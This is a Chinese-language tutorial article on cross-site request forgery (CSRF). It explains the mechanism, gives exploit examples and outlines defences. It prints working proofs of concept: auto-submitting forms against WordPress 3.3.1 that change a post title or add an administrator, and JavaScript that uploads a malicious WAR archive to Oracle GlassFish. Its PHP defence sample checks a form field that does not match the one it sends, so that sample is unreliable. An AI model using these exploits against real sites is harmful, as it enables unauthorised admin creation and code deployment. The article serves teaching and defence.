Loading
0

CSRF 详解与攻防实战

Cross Site Request Forgery
CSRF(Cross-site request forgery),中文名称:跨站请求伪造,也被称为:one click attack/session riding,缩写为:CSRF/XSRF。CSRF与XSS在攻击手段上有点类似,都是在客户端执行恶意代码,有些文章中认为CSRF与XSS的区别在于CSRF不注重于获取用户Cookie,笔者认为可能还有区别在于CSRF不仅可以在源站发起攻击,还可以引导用户访问其他危险网站的同时发起攻击。XSS全程是跨站脚本攻击,即攻击者向某个Web页面中插入恶意的JavaScript脚本,而当普通用户访问时,该恶意脚本自动执行而从盗取用户的Cookie等信息。对于XSS的防御手段主要就是输入检查与输出检查,譬如对用户输入的文本框内容进行<、>这样的特殊字符检查。而输出检查则是指对于输出到网页的内容进行过滤或者编解码,譬如使用HTML编码将<转义。CSRF为跨站请求伪造,其与XSS有点类似,不过区别在于CSRF不一定依赖于JavaScript,并且不仅可以在源站发起攻击,还有可能当用户访问恶意网站时引导其访问原网站。CSRF攻击是源于WEB的隐式身份验证机制,WEB的身份验证机制虽然可以保证一个请求是来自于某个用户的浏览器,但却无法保证该请求是用户批准发送的。对于CSRF的防御也分为服务端防御与客户端防御两种,服务端防御典型的譬如给某个页面添加随机数,使得无法从第三方页面直接提交。在客户端防御的话可以利用譬如Firefox提供的一些检查工具。注意,CSRF并没有打破同源策略。 以下面的这个例子来说:银行网站A,它以GET请求来完成银行转账的操作,如:http://www.mybank.com/Transfer.php?toBankId=11&money=1000危险网站B,它里面有一段HTML的代码如下:

  1. <img src=http://www.mybank.com/Transfer.php?toBankId=11&money=1000>

银行网站A违反了HTTP规范,使用GET请求更新资源。在访问危险网站B的之前,你已经登录了银行网站A,而B中的<img>以GET的方 式请求第三方资源(这里的第三方就是指银行网站了,原本这是一个合法的请求,但这里被不法分子利用了),所以你的浏览器会带上你的银行网站A的 Cookie发出Get请求,去获取资源“http://www.mybank.com/Transfe... money=1000”,结果银行网站服务器收到请求后,认为这是一个更新资源操作(转账操作),所以就立刻进行转账操作。参考深入解析跨站请求伪造漏洞:原理剖析(中所述,XSS与CSRF的区别在于:

  • XSS攻击需要JavaScript,而CSRF攻击不需要。
  • XSS攻击要求站点接受恶意代码,而对于CSRF攻击来说,恶意代码位于第三方站点上。过滤用户的输入可以防止恶意代码注入到某个站点,但是它无阻止法恶意代码在第三方站点上运行。

原因浅析
CSRF攻击是源于WEB的隐式身份验证机制,WEB的身份验证机制虽然可以保证一个请求是来自于某个用户的浏览器,但却无法保证该请求是用户批准发送的。假设Alice访问了一个恶意站点M,该站点提供的内容中的JavaScript代码或者图像标签会导致Alice的浏览器向站点T发送一个HTTP请 求。由于该请求是发给站点T的,所以Alice的浏览器自动地给该请求附上与站点T对应的该会话cookie的sid。站点T看到该请求时,它就能通过该 cookie的推断出:该请求来自Alice,所以站点T就会对Alice的帐户执行所请求的操作。这样,CSRF攻击就能得逞了。其他大多数Web认证机制也面临同样的问题。例如,HTTP BasicAuth机制会要求Alice告诉浏览器她在站点T上的用户名和口令,于是浏览器将用户名和口令附加到之后发给站点T的请求中。当然,站点T也 可能使用客户端SSL证书,但这也面临同样的问题,因为浏览器也会将证书附加到发给站点T的请求中。类似的,如果站点T通过IP地址来验证Alice的身 份的话,照样面临CSRF攻击的威胁。总之,只要身份认证是隐式进行的,就会存在CSRF攻击的危险,因为浏览器发出请求这一动作未必是受用户的指使。原则上,这种威胁可以通过对每个发送至该 站点的请求都要求用户进行显式的、不可欺骗的动作(诸如重新输入用户名和口令)来消除,但实际上这会导致严重的易用性问题。大部分标准和广泛应用的认证机 制都无法防止CSRF攻击,所以我们只好另外探求一个实用的解决方案。
Reference

Exploits
 

本部分我们来看几个基于CSRF攻击的实例,包括简单的基于表单POST请求的攻击 ,其可以诱导用户点击.submit() 按钮既可以发起攻击。其他的还有稍微复杂一点的跨域文件上传CSRF攻击 ,其主要使用了 CORS use of the xhr.withCredentals behavior。

Wordpress 3.3.1 Multiple CSRF Vulnerabilities

该漏洞是由Ivano Binetti在2012年3月19号发现的,影响了WordPress 3.3.1版本 ,CVE编号CVE-2012-1936。WordPress是众所周知的博客平台,该漏洞可以允许攻击者修改某个Post的标题,添加管理权限用户以及操作用户账户,包括但不限于删除评论、修改头像等等。具体的列表如下:

  • Add Admin/User
  • Delete Admin/User
  • Approve comment
  • Unapprove comment
  • Delete comment
  • Change background image
  • Insert custom header image
  • Change site title
  • Change administrator's email
  • Change WordPress Address
  • Change Site Address

那么这个漏洞实际上就是攻击者引导用户先进入目标的WordPress,然后点击其钓鱼站点上的某个按钮,该按钮实际上是表单提交按钮,其会触发表单的提交工作,核心的Exploit代码为:

	
  1. <html> 
  2. <body onload="javascript:document.forms[0].submit()"> 
  3. <H2>CSRF Exploit to change post title</H2> 
  4. <form method="POST" name="form0" action="http://<wordpress_ip>:80/wp-admin/admin-ajax.php"> 
  5. <input type="hidden" name="post_title" value="hackedtitle"/> 
  6. <input type="hidden" name="post_name" value="hackedtitle"/> 
  7. <input type="hidden" name="mm" value="03"/> 
  8. <input type="hidden" name="jj" value="16"/> 
  9. <input type="hidden" name="aa" value="2012"/> 
  10. <input type="hidden" name="hh" value=""/> 
  11. <input type="hidden" name="mn" value=""/> 
  12. <input type="hidden" name="ss" value=""/> 
  13. <input type="hidden" name="post_author" value="1"/> 
  14. <input type="hidden" name="post_password" value=""/> 
  15. <input type="hidden" name="post_category%5B%5D" value="0"/> 
  16. <input type="hidden" name="post_category%5B%5D" value="1"/> 
  17. <input type="hidden" name="tax_input%5Bpost_tag%5D" value=""/> 
  18. <input type="hidden" name="comment_status" value="open"/> 
  19. <input type="hidden" name="ping_status" value="open"/> 
  20. <input type="hidden" name="_status" value="publish"/> 
  21. <input type="hidden" name="post_format" value="0"/> 
  22. <input type="hidden" name="_inline_edit" value="<sniffed_value>"/> 
  23. <input type="hidden" name="post_view" value="list"/> 
  24. <input type="hidden" name="screen" value="edit-post"/> 
  25. <input type="hidden" name="action" value="inline-save"/> 
  26. <input type="hidden" name="post_type" value="post"/> 
  27. <input type="hidden" name="post_ID" value="1"/> 
  28. <input type="hidden" name="edit_date" value="true"/> 
  29. <input type="hidden" name="post_status" value="all"/> 
  30. </form> 
  31. </body> 
  32. </html> 

隐藏域另一个测试用例时添加某个具有管理员权限的用户,测试用例为:

	
  1. <html> 
  2. <body onload="javascript:document.forms[0].submit()"> 
  3. <H2>CSRF Exploit to add Administrator</H2> 
  4. <form method="POST" name="form0" action="http://<wordpress_ip>:80/wp-admin/user-new.php"> 
  5. <input type="hidden" name="action" value="createuser"/> 
  6. <input type="hidden" name="_wpnonce_create-user" value="<sniffed_value>"/> 
  7. <input type="hidden" name="_wp_http_referer" value="%2Fwordpress%2Fwp-admin%2Fuser-new.php"/> 
  8. <input type="hidden" name="user_login" value="admin2"/> 
  9. <input type="hidden" name="email" value="admin2@admin.com"/> 
  10. <input type="hidden" name="first_name" value="admin2@admin.com"/> 
  11. <input type="hidden" name="last_name" value=""/> 
  12. <input type="hidden" name="url" value=""/> 
  13. <input type="hidden" name="pass1" value="password"/> 
  14. <input type="hidden" name="pass2" value="password"/> 
  15. <input type="hidden" name="role" value="administrator"/> 
  16. <input type="hidden" name="createuser" value="Add+New+User+"/> 
  17. </form> 
  18. </body> 
  19. </html> 

{C} Oracle GlassFish Server - REST Cross-Site Request Forgery

该漏洞是由Security-Assessment.com发现的,Oracle GlassFish服务器的REST接口可以被CSRF请求攻击,譬如其可以允许普通用户任意上传WAR包,并且可以控制在服务端运行从而导致窃取其他运行应用的信息。关于具体的攻击复盘可以参考这里。其攻击手段是首先在钓鱼站点上设置如下按钮:

	
  1. <button id="upload" onclick="start()" type="button">Upload WAR Archive</button> 

然后添加如下脚本:

	
  1. var logUrl = 'http://glassfishserver/management/domain/applications/application';  
  2.     
  3. function fileUpload(fileData, fileName) {  
  4.     var fileSize = fileData.length,  
  5.       boundary = "---------------------------270883142628617",  
  6.       uri = logUrl,  
  7.       xhr = new XMLHttpRequest();  
  8.     
  9.     var additionalFields = {  
  10.           asyncreplication: "true",  
  11.           availabilityenabled: "false",  
  12.           contextroot: "",  
  13.         createtables: "true",  
  14.         dbvendorname: "",  
  15.         deploymentplan: "",  
  16.         description: "",  
  17.         dropandcreatetables: "true",  
  18.         enabled: "true",  
  19.         force: "false",  
  20.         generatermistubs: "false",  
  21.         isredeploy: "false",  
  22.         keepfailedstubs: "false",  
  23.         keepreposdir: "false",  
  24.         keepstate: "true",  
  25.         lbenabled: "true",  
  26.         libraries: "",  
  27.         logReportedErrors: "true",  
  28.         name: "",  
  29.         precompilejsp: "false",  
  30.         properties: "",  
  31.         property: "",  
  32.         retrieve: "",  
  33.         target: "",  
  34.         type: "",  
  35.         uniquetablenames: "true",  
  36.         verify: "false",  
  37.         virtualservers: "",  
  38.         __remove_empty_entries__: "true"  
  39.             
  40.     }  
  41.         
  42.     if (typeof XMLHttpRequest.prototype.sendAsBinary == "function") { // Firefox 3 & 4  
  43.     var tmp = '';  
  44.     for (var i = 0; i < fileData.length; i++) tmp +=  
  45. String.fromCharCode(fileData.charCodeAt(i) & 0xff);  
  46.     fileData = tmp;  
  47.   }  
  48.   else { // Chrome 9  
  49.     // http://javascript0.org/wiki/Portable_sendAsBinary  
  50.     XMLHttpRequest.prototype.sendAsBinary = function(text){  
  51.       var data = new ArrayBuffer(text.length);  
  52.       var ui8a = new Uint8Array(data, 0);  
  53.       for (var i = 0; i < text.length; i++) ui8a[i] = (text.charCodeAt(i) & 0xff);  
  54.     
  55.       var bb = new (window.BlobBuilder || window.WebKitBlobBuilder)();  
  56.     
  57.       bb.append(data);  
  58.       var blob = bb.getBlob();  
  59.       this.send(blob);  
  60.       
  61.     }  
  62.   }  
  63.     var fileFieldName = "id";  
  64.     xhr.open("POST", uri, true);  
  65.     xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary="+boundary); // simulate a  
  66. file MIME POST request.  
  67.     xhr.setRequestHeader("Content-Length", fileSize);  
  68.     xhr.withCredentials = "true";  
  69.     xhr.onreadystatechange = function() {  
  70.       if (xhr.readyState == 4) {  
  71.         if ((xhr.status >= 200 && xhr.status <= 200) || xhr.status == 304) {  
  72.               
  73.           if (xhr.responseText != "") {  
  74.             alert(JSON.parse(xhr.responseText).msg);   
  75.           }  
  76.         } else if (xhr.status == 0) {  
  77.               
  78.         }  
  79.       }  
  80.     }  
  81.         
  82.     var body = "";  
  83.         
  84.     for (var i in additionalFields) {  
  85.       if (additionalFields.hasOwnProperty(i)) {  
  86.         body += addField(i, additionalFields[i], boundary);  
  87.       }  
  88.     }  
  89.     
  90.     body += addFileField(fileFieldName, fileData, fileName, boundary);  
  91.     body += "--" + boundary + "--";  
  92.     xhr.sendAsBinary(body);  
  93.     return true;  
  94. }  
  95.     
  96. function addField(name, value, boundary) {  
  97.   var c = "--" + boundary + "\r\n"  
  98.   c += 'Content-Disposition: form-data; name="' + name + '"\r\n\r\n';  
  99.   c += value + "\r\n";  
  100.   return c;  
  101. }  
  102.     
  103. function addFileField(name, value, filename, boundary) {  
  104.     var c = "--" + boundary + "\r\n"  
  105.     c += 'Content-Disposition: form-data; name="' + name + '"; filename="' + filename + '"\r\n';  
  106.     c += "Content-Type: application/octet-stream\r\n\r\n";  
  107.     c += value + "\r\n";  
  108.     return c;    
  109. }  
  110.     
  111. function getBinary(file){  
  112.   var xhr = new XMLHttpRequest();    
  113.   xhr.open("GET", file, false);    
  114.   xhr.overrideMimeType("text/plain; charset=x-user-defined");    
  115.   xhr.send(null);  
  116.   return xhr.responseText;  
  117. }  
  118.     
  119. function readBinary(data) {  
  120.     
  121. var tmp = '';  
  122.     for (var i = 0; i < data.length; i++) tmp += String.fromCharCode(data.charCodeAt(i) &  
  123. 0xff);  
  124.     data = tmp;  
  125.     return tmp;  
  126.     }  
  127.     
  128. function start() {  
  129.   var c = getBinary('maliciousarchive.war');  
  130.   fileUpload(c, "maliciousarchive.war");  
  131.       
  132. }  

防御

服务端防御

遵循标准的GET动作

只允许GET请求检索数据,但是不允许它修改服务器上的任何数据。这个修改可以防止利用{img}标签或者其它的类型的GET请求的CSRF攻击。另外,这个建议遵循RFC 2616(HTTP/1.1):具体说来,按照约定,GET和HEAD方法不应该进行检索之外的动作。这些方法应该被认为是“安全的”。虽然这个保护措施无法阻止CSRF本身,因 为攻击者可以使用POST请求,但是它却可以与(2)结合来全面防止CSRF漏洞。这里,我们假定对手无法修改用户的cookie。

为页面增加随机数

当用户访问站点时,该站点应该生成一个(密码上很强壮的)伪随机值,并在用户的计算机上将其设为cookie。站点应该要求每个表单都包含该伪随机 值(作为表单值和cookie值)。当一个POST请求被发给站点时,只有表单值和cookie值相同时,该请求才会被认为是有效的。当攻击者以一个用户的名义提交表单时,他只能修改该表单的值。攻击者不能读取任何发自该服务器的数据或者修改cookie值,这是同源策略的缘故。 这意味着,虽然攻击者可以用表单发送任何他想要的值,但是他却不能修改或者读取存储在该cookie中的值。因为cookie值和表单值必须是相同的,所 以除非攻击者能猜出该伪随机值,否则他就无法成功地提交表单。以PHP为例,我们可以在服务端首先生成随机数:

	
  1. <?php 
  2. //构造加密的Cookie信息 
  3. $value = “DefenseSCRF”; 
  4. setcookie(”cookie”, $value, time()+3600); 
  5. ?> 

在表单里增加Hash值,以认证这确实是用户发送的请求。

	
  1. <?php 
  2. $hash = md5($_COOKIE['cookie']); 
  3. ?> 
  4. <form method=”POST” action=”transfer.php”> 
  5. <input type=”text” name=”toBankId”> 
  6. <input type=”text” name=”money”> 
  7. <input type=”hidden” name=”hash” value=”<?=$hash;?>”> 
  8. <input type=”submit” name=”submit” value=”Submit”> 
  9. </form> 

然后在服务器端进行Hash值验证:

	
  1. <?php 
  2.   if(isset($_POST['check'])) { 
  3.       $hash = md5($_COOKIE['cookie']); 
  4.      if($_POST['check'] == $hash) { 
  5.           doJob(); 
  6.        } else { 
  7. //... 
  8.      } 
  9.   } else { 
  10. //... 
  11.   } 
  12. ?> 

当然,我们也可以强制要求用户进行任何增删改的操作时都需要输入验证码,即进行用户交互,不过这样也就意味着很差的用户体验。

客户端防御

由于使攻击者成功地执行CSRF攻击的请求是由浏览器发出的,所以可以创建客户端工具来保护用户不受此种攻击。现有的工具RequestRodeo 通过在客户和服务器之间充当代理来防止CSRF攻击。如果RequestRodeo发现了一个它认为是非法的请求,它会从该请求剥离验证信息。虽然这种方 式在很多情况下都能有效,但是它具有一些局限性。具体地说,当客户端使用了SSL认证或者使用JavaScript生成部分页面(因为 RequestRodeo分析的是在浏览器显示之前的流经代理的那些数据)时,它就不起作用了。 人们已经开发了一个浏览器插件,不仅可以使用户可以免受某些类型的CSRF攻击,并且还能克服以上所述的局限性,这个工具是作为Firefox浏览器的扩 展实现的,其地址是http://www.cs.princeton.edu/˜wzeller/csrf/protector/。 为了有效地防范CSRF攻击,用户需要下载安装这个扩展。该扩展会拦截所有的HTTP请求,并判断是否允许该HTTP请求。这个判断要用到下列规则。首 先,POST请求之外的任何要求都是允许的。第二,如果发出请求的站点和目标站点符合同源策略的要求,那么该请求被允许。第三,如果发出请求的站点被允许 使用Adobe的跨域政策来建立一个请求的话,那么该请求也会被允许。如果我们的扩展拒绝一个请求,该扩展会通过一个常见的界面来提示用户(即 Firefox所使用的popup blocker)该请求已经被阻止,并且让用户选择是否将站点添加到一个白名单中。

该扩展仅仅拦截POST请求。这意味着,它无法保护用户免受使用GET请求的CSRF攻击 阻止这种类型的攻击的唯一方法是不允许任何跨域GET请求,或只允许用户一次只能登录到一个站点,但是这两个限制可能是用户无法忍受的。

【声明】:8090安全小组门户(https://www.8090-sec.com)登载此文出于传递更多信息之目的,并不代表本站赞同其观点和对其真实性负责,仅适于网络安全技术爱好者学习研究使用,学习中请遵循国家相关法律法规。如有问题请联系我们:邮箱hack@ddos.kim,我们会在最短的时间内进行处理。